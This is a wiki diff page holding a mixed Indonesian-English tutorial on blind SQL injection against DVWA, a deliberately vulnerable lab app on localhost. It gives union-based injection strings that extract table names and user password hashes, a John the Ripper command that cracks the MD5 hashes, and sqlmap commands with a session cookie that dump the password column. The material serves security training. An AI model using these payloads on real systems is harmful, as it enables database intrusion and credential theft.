Difference between revisions of "DVWA: SQLi blind"

From OnnoWiki
Jump to navigation Jump to search
Line 50: Line 50:
 
Lakukan di terminal,
 
Lakukan di terminal,
  
  root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;
+
  root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -T users --columns
PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -T users --columns
 
  
 
  --> "security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="
 
  --> "security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="
Line 59: Line 58:
 
lihat tables
 
lihat tables
  
  root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;
+
  root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -D dvwa --tables
PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -D dvwa --tables
 
  
 
lihat kolom di user tabel
 
lihat kolom di user tabel
  
  
  root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;  
+
  root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -T users --columns
PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -T users --columns
 
  
 
lihat field password & dump
 
lihat field password & dump
  
  root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;  
+
  root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -C password --dump
PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -C password --dump
 
  
  

Revision as of 07:43, 4 March 2017

DVWA-BLIND SQL INJECTION : LOW Level

1. Open Local host http://localhost/dvwa

Username :  Admin
Password : Password

3.Select SQL Injection BLIND and column ID issued

1' and 1=1#
1' and 1=1 order by 2 #

5.ID: 'or' 1=1--

we can see there are 5 user

5. now see information table

1' and 1=0 union select null,table_name from information_schema.tables#
1' and 1=0 union select null,table_name from information_schema.columns where table_name='users #

7. Information table name from table user

1' and 1=0 union select null,concat(table_name,0x0a,column_name) from information_schema.columns where table_name='users #

8. on the last lets see user name and password

1' and 1=0 union select null,concat(first_name,0x0a,password) from users #

9. we will crack the md5 password

copy the passowrd into kwrite and save with name hash
next


root@bt:/pentest/passwords/john#./john --format=raw-md5 hash 


OK GOOD LUCK

Ok next lesson .. I will explain How to Exploit DVWA using Sqlmap.

1. afer login in DVWA and choose DVWA Securty Low 2. follow this picture

In User ID write '1

than show

Lakukan di terminal,

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -T users --columns
--> "security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="

di peroleh dari addon tamer di browser.

lihat tables

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -D dvwa --tables

lihat kolom di user tabel


root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -T users --columns

lihat field password & dump

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -C password --dump


Referensi